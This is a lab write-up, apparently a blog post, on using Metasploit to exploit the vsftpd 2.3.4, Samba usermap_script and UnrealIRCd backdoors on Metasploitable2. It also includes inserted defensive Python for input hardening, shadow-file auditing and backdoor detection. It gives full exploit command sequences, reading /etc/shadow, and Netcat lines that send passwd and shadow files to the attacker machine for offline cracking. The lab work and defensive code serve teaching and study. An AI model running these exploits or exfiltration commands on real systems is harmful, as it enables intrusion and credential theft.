Scanning a network and listing open ports is useful. Actually exploiting those ports and landing
a root shell — that is where exploitation begins. In this write-up I walk through a full Metasploit
session against Metasploitable2: setting up the framework with a PostgreSQL backend, running
a database-backed Nmap scan, exploiting three separate vulnerabilities (vsftpd, Samba, and
UnrealIRCd), exfiltrating credential files over Netcat, and understanding exactly why each
vulnerability works.
Everything here was run in an isolated VirtualBox lab. No external systems were touched.
The Problem This Solves
You have enumerated a target and you have a service list. Now what? Knowing that port 21 runs
vsftpd 2.3.4 is one thing. Knowing that vsftpd 2.3.4 ships with a compiled-in backdoor — and
being able to trigger it in three commands — is something else entirely. This post covers the full
path from service discovery to root shell across three different attack surfaces.
Lab Environment
| Machine | Role | IP Address |
|---|---|---|
| Kali Linux 2026.1 | Attacker | 192.168.1.4 |
| Metasploitable2 | Target | 192.168.1.3 |
Network: 192.168.1.0/24 — fully isolated NAT network inside VirtualBox.
Step 1 — Setting Up Metasploit with a Database Backend
Metasploit stores scan results, hosts, services, and vulnerabilities in a PostgreSQL database.
Getting this set up correctly before starting means all your Nmap results persist between
sessions and you can query them inside msfconsole.
# Start PostgreSQL
sudo systemctl start postgresql
# Initialize the Metasploit database (one time only)
sudo msfdb init
# Launch Metasploit
msfconsole
Once inside msfconsole:
# Verify database connection
msf6> db_status
# [*] Connected to msf. Connection type: postgresql.
# Create a workspace for this session
msf6> workspace -a 178-metasploitable2
# Confirm the workspace is active
msf6> workspace
Now run a full Nmap scan directly from within Metasploit. The db_nmap command runs Nmap
and automatically saves all results to the database.
msf6> db_nmap -A 192.168.1.0/24 -n
After the scan completes, query the results:
msf6> hosts # List all discovered hosts
msf6> services # List all discovered services
Two FTP servers were found running on Metasploitable2:
| Port | Service | Info |
|---|---|---|
| 21/tcp | ftp | vsftpd 2.3.4 |
| 2121/tcp | ftp | ProFTPD 1.3.1 |
The full services table also revealed SSH, Telnet, SMTP, HTTP, MySQL, PostgreSQL, VNC,
Samba (on 139 and 445), IRC on 6667, and a Metasploitable root shell on 1524 — a deliberately
over-exposed machine.
Step 2 — Exploiting vsftpd 2.3.4 (Backdoor Command Execution)
The Vulnerability
In July 2011, someone compromised the vsftpd 2.3.4 download mirror and inserted a malicious
backdoor into the source archive. The backdoor is simple and elegant in a malicious way: if the
FTP username contains a :) smiley face character, the server opens a TCP callback shell on
port 6200. The code diff is documented at https://pastebin.com/AetT9sS5.
Finding the Exploit
msf6> search type:exploit name:vsftpd
One result came back:
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes
Running the Exploit
msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info
msf6> show options
# Required options: RHOSTS, RPORT
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit
The exploit triggered the backdoor and opened a Meterpreter session. Dropping to a shell:
meterpreter> shell
whoami
# root
uname -a
# Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Extracting the Shadow File
With root access, the /etc/shadow file — which stores hashed user passwords — is readable:
cat /etc/shadow | grep '$1'
This outputs the MD5-hashed ($1$) passwords for all accounts that have a password set.
The hash format is $1$<salt>$<hash> — crackable offline with tools like John the Ripper or
Hashcat.
Step 3 — Exploiting Samba (CVE-2007-2447)
The Vulnerability
The Samba username map script configuration option — present in versions 3.0.0 through
3.0.25rc3 — allows shell meta-characters in the username field to be passed directly to
/bin/sh. No authentication is required because the username is processed before
authentication occurs. This is CVE-2007-2447, and Metasploitable2 runs Samba 3.0.20-Debian.
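The root cause described above is a classic shell-injection pattern: a client-controlled string is spliced into a command line that /bin/sh later interprets. The following Python is an added illustration, not Samba's code, that contrasts that pre-fix pattern with the hardened form (allow-list the username, then pass it as a single argv element with no shell in between). The script path, the allow-list policy and the sample usernames are assumptions made for the example. As a mitigation note, the vulnerable path is only reachable when the `username map script` option is configured, so removing the option or upgrading both close it.

```python
"""Hardened handling of a username that is handed to an external
'username map' script, modelled on the CVE-2007-2447 root cause.
Added example, not Samba's code: the script path, the allow-list and
the argv shape are assumptions made for illustration."""
import re

# Assumed policy: POSIX-portable usernames only (lowercase letters, digits,
# '_', '.', '-', at most 32 characters). Every shell metacharacter falls
# outside this set, so the check rejects injection attempts by construction.
_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")

# Characters /bin/sh interprets; used only to explain why a name was rejected.
_SHELL_META = set(";&|`$<>()\\\"'*?[]{}~#!\n\t ")


def vulnerable_command_line(script: str, username: str) -> str:
    """Pre-fix pattern: the username is spliced into one command string that
    is later executed via /bin/sh -c, so the shell interprets any
    metacharacters the client supplied. Built for comparison, never run."""
    return f"{script} {username}"


def hardened_argv(script: str, username: str) -> list:
    """Fixed pattern: reject anything outside the allow-list, then pass the
    name as a single argv element (subprocess.run(argv) with shell=False),
    so it reaches the script as one literal argument."""
    if not _USERNAME_RE.fullmatch(username):
        bad = sorted({c for c in username if c in _SHELL_META})
        raise ValueError(
            f"rejected username {username!r}: not in allow-list"
            + (f", contains shell metacharacters {bad}" if bad else "")
        )
    return [script, username]


def check_username(script: str, username: str) -> dict:
    """Evaluate one constructed login attempt and report both code paths."""
    result = {
        "username": username,
        "vulnerable_line": vulnerable_command_line(script, username),
    }
    try:
        result["argv"] = hardened_argv(script, username)
        result["accepted"] = True
    except ValueError as exc:
        result["argv"] = None
        result["accepted"] = False
        result["reason"] = str(exc)
    return result


if __name__ == "__main__":
    SCRIPT = "/usr/local/sbin/map_user.sh"  # assumed path, not a Samba default
    for name in ("msfadmin", "bad name", "alice;x"):  # constructed inputs
        print(check_username(SCRIPT, name))
```

The point of `hardened_argv` is that validation happens before any process is spawned and the name is never re-parsed by a shell; even if the allow-list were loosened, the argv form would still hand the script exactly one argument.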
msf6> search type:exploit name:samba
# Returns ~7 Samba exploits
msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> set RHOSTS 192.168.1.3
msf6> exploit
whoami
# root
smbd --version
# Version 3.0.20-Debian
Exfiltrating Credential Files with Netcat
With shell access via the Samba exploit, I used Netcat to pull /etc/passwd and /etc/shadow
off the target cleanly — no copy-paste, just piped data over TCP.
On Kali (Tab 2 — listening):
nc -l -p 4567 > passwd.txt
On the exploit shell (Tab 1 — sending):
cat /etc/passwd | nc 192.168.1.4 4567
Kill the listener with CTRL-C and verify the file arrived:
cat passwd.txt
Repeat for /etc/shadow:
# Tab 2
nc -l -p 4567 > shadow.txt
# Tab 1 (exploit shell)
cat /etc/shadow | nc 192.168.1.4 4567
Then merge both files with unshadow for offline cracking:
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt
The unshadow command combines the username/home directory fields from /etc/passwd with
the hash fields from /etc/shadow into a single format that password crackers like John the
Ripper can consume directly.
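To make the two formats concrete, here is an added Python example (not John the Ripper's unshadow and not the post's own code) that parses constructed /etc/passwd and /etc/shadow samples, performs the same field merge unshadow does, and then does what a defender would do with the same data: flag accounts whose hash field is empty or still uses the $1$ md5crypt scheme discussed under Step 2. The sample lines and hash strings are placeholders built for the example, not values from Metasploitable2.

```python
"""Parse /etc/passwd and /etc/shadow, reproduce the field merge that
unshadow performs, and audit the hash fields for legacy algorithms.
Added example with constructed sample data; it is not John the Ripper's
unshadow and the sample hashes are not real Metasploitable2 values."""

# Constructed sample files (hash strings are placeholders, not real digests).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
svc:x:1001:1001::/home/svc:/bin/bash
"""
SHADOW = """\
root:$1$abcdefgh$0123456789abcdefghijkl:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
msfadmin:$6$saltsalt$PLACEHOLDERHASHPLACEHOLDERHASH:14747:0:99999:7:::
svc::14747:0:99999:7:::
"""

# crypt(3) identifier prefixes that can appear in the shadow hash field.
HASH_ALGOS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
              "$y$": "yescrypt", "$2y$": "bcrypt", "$2b$": "bcrypt"}


def parse_shadow(text: str) -> dict:
    """Map username -> hash field (the second colon-separated field)."""
    result = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        result[fields[0]] = fields[1]
    return result


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """Rebuild each passwd line with the shadow hash in place of the 'x'."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line:
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def classify_hash(field: str) -> str:
    """Return 'empty', 'locked', the algorithm name, or 'unknown'."""
    if field == "":
        return "empty"
    if field.startswith(("*", "!")):
        return "locked"
    for prefix, name in HASH_ALGOS.items():
        if field.startswith(prefix):
            return name
    return "unknown"


def audit_shadow(shadow_text: str) -> list:
    """Findings a defender acts on: accounts with an empty hash field and
    accounts still on md5crypt ($1$), which is fast to brute-force offline."""
    findings = []
    for user, field in parse_shadow(shadow_text).items():
        kind = classify_hash(field)
        if kind == "empty":
            findings.append((user, "empty hash field: no credential required where nullok is allowed"))
        elif kind == "md5crypt":
            findings.append((user, "md5crypt hash: rehash with sha512crypt or yescrypt"))
    return findings


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    for user, issue in audit_shadow(SHADOW):
        print(f"{user}: {issue}")
```

On a real host the same `audit_shadow` logic, run against the live /etc/shadow as root, is a quick way to find the legacy $1$ hashes the post shows being harvested; rehashing happens automatically on the next password change once the crypt default in /etc/login.defs or PAM is set to a modern scheme.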
Step 4 — Exploiting UnrealIRCd 3.2.8.1 (Backdoor)
The Vulnerability
UnrealIRCd 3.2.8.1 was distributed with a deliberate backdoor inserted into its source code.
When the character sequence AB is sent to the IRC port (6667), the server executes any
command that follows it with root privileges — no authentication, no handshake. This is
identical in concept to the vsftpd backdoor: a supply-chain compromise of the software
distribution itself.
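Both backdoors, the vsftpd one from Step 2 and the UnrealIRCd one just described, announce themselves on the wire with a fixed byte pattern, which is exactly what a network detection can key on. The following Python is an added example (not from the post or from any IDS project) that applies both signatures to a constructed list of connection records: a USER command containing :) on port 21, escalated if the same client then opens TCP/6200, and a client line beginning with AB on port 6667, following the post's description of the trigger. The record shape and sample traffic are assumptions built for the example.

```python
"""Signature checks for the two supply-chain backdoors in this write-up:
vsftpd 2.3.4 (an FTP USER command containing ':)', followed by a client
connection to TCP/6200) and UnrealIRCd 3.2.8.1 (a line beginning with
'AB' sent to the IRC port). Added example; the event records are a
constructed, assumed shape, not output of any real sensor."""
from dataclasses import dataclass


@dataclass
class Event:
    ts: int          # seconds since capture start
    src: str
    dst: str
    dport: int
    payload: str     # first line the client sent; "" for a bare connect


# Constructed traffic: one ordinary FTP login, one ordinary IRC NICK, then
# the two trigger patterns from a second client.
EVENTS = [
    Event(100, "10.0.0.5", "10.0.0.9", 21, "USER msfadmin"),
    Event(101, "10.0.0.5", "10.0.0.9", 6667, "NICK alice"),
    Event(102, "10.0.0.7", "10.0.0.9", 21, "USER guest:)"),
    Event(104, "10.0.0.7", "10.0.0.9", 6200, ""),
    Event(110, "10.0.0.7", "10.0.0.9", 6667, "AB (rest omitted)"),
]


@dataclass
class Alert:
    rule: str
    src: str
    dst: str
    note: str


def is_vsftpd_trigger(ev: Event) -> bool:
    """USER command whose argument contains ':)' on the FTP control port."""
    return ev.dport == 21 and ev.payload.upper().startswith("USER ") and ":)" in ev.payload


def is_unrealircd_trigger(ev: Event) -> bool:
    """Client line starting with 'AB' on the IRC port; no legitimate IRC
    command begins with those two letters."""
    return ev.dport == 6667 and ev.payload.startswith("AB")


def detect(events, window_s: int = 60) -> list:
    """Run both signatures; for vsftpd, escalate when the same client opens
    TCP/6200 on the same host within window_s seconds of the trigger."""
    alerts = []
    bare_6200 = [e for e in events if e.dport == 6200 and e.payload == ""]
    for ev in events:
        if is_vsftpd_trigger(ev):
            followed = any(
                c.src == ev.src and c.dst == ev.dst and 0 <= c.ts - ev.ts <= window_s
                for c in bare_6200
            )
            note = ("backdoor port 6200 contacted afterwards" if followed
                    else "trigger seen, no 6200 follow-up")
            alerts.append(Alert("vsftpd-2.3.4-backdoor", ev.src, ev.dst, note))
        elif is_unrealircd_trigger(ev):
            alerts.append(Alert("unrealircd-3.2.8.1-backdoor", ev.src, ev.dst,
                                "AB prefix on IRC port"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The two-stage vsftpd rule matters in practice: a lone :) in a username is unusual but not proof, whereas a connection to 6200 from the same client moments later is the backdoor being used, so the second alert deserves a much higher severity.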
Finding and Running the Exploit
msf6> search type:exploit name:unreal
# Found: exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit
whoami
# root
uname -a
# Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Required options for this exploit:
| Option | Value | Description |
|---|---|---|
| RHOSTS | 192.168.1.3 | Target IP |
| RPORT | 6667 | IRC default port |
| LHOST | 192.168.1.4 | Kali listener IP |
| payload | cmd/unix/bind_netcat | Bind shell via Netcat |
Three exploits. Three root shells. Same target, different attack surfaces.
How Metasploit's Workflow Connects
One thing that becomes clear when running these exploits back to back is how Metasploit is
designed as a pipeline, not just a collection of scripts.
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell
Each stage feeds the next. The database stores your scan results so you are not re-running
Nmap every time you switch exploits. Workspaces keep different engagements isolated.
search filters by type, name, platform, CVE, rank — whatever is useful. info gives you the
full context before you commit to running anything.
How to Verify Your Results
| Check | Command |
|---|---|
| Confirm database connection | msf6> db_status |
| List discovered services | msf6> services |
| Verify vsftpd version | msf6> services -S ftp |
| Confirm Samba version post-exploit | smbd --version on remote shell |
| Verify root access | whoami on remote shell |
| Check kernel version | uname -a on remote shell |
| Verify exfiltrated file | wc -l passwd.txt — should match /etc/passwd line count |
What I Learned
Supply-chain attacks are not new. Both vsftpd 2.3.4 and UnrealIRCd 3.2.8.1 were
compromised at the distribution level — malicious code was baked into the official download.
Users who verified package signatures would have caught this; most did not. The pattern is
identical to modern supply-chain incidents, just from 2011 and earlier.
No authentication needed does not mean no access. CVE-2007-2447 in Samba processes
the username before authentication happens. The exploit fires before Samba even checks
credentials. This means patching is the only mitigation — there is no authentication control that
stops it.
Netcat is still one of the most useful tools in the kit. No GUI, no protocol overhead, no
dependencies. cat file | nc ip port for exfiltration and nc -l -p port > file for receiving is
a pattern that works across almost every Unix system regardless of what else is installed.
Metasploit is a framework, not a button. The power is in understanding what each module
does, what CVE it maps to, and what options it requires — not just typing exploit and hoping.
Running info before exploit should be a habit.
Common Mistakes
| Mistake | What Happens | Fix |
|---|---|---|
| Skipping msfdb init | msfconsole launches but has no database — scan results are not saved | Run sudo msfdb init once before first use |
| Not setting LHOST | Reverse shell has nowhere to connect back to | Always set LHOST to your Kali IP for reverse payloads |
| Running msfdb init every session | Overwrites existing data | Run it once only; use sudo msfdb status to check |
| Using wrong RPORT | Exploit sends payload to wrong port and fails silently | Confirm port from services output before setting |
| Closing the Netcat listener too early | Partial file transfer, truncated output | Wait a moment after the pipe command before CTRL-C |
| Not running unshadow before cracking | Password crackers need combined format | Always merge passwd + shadow before attempting cracks |
Conclusion
Three exploits, three root shells, two credential files exfiltrated, and one clear picture of how
Metasploit operates as a framework. The vsftpd backdoor triggers on a smiley face in the
username. The Samba usermap_script flaw passes shell meta-characters straight to /bin/sh
before authentication. The UnrealIRCd backdoor executes commands as root the moment it sees
AB on the wire.
All three vulnerabilities have one thing in common: they were not found through fuzzing or
memory corruption. They were backdoors — intentional, inserted at the source, and effective
until someone noticed. That context matters when thinking about software supply chains today.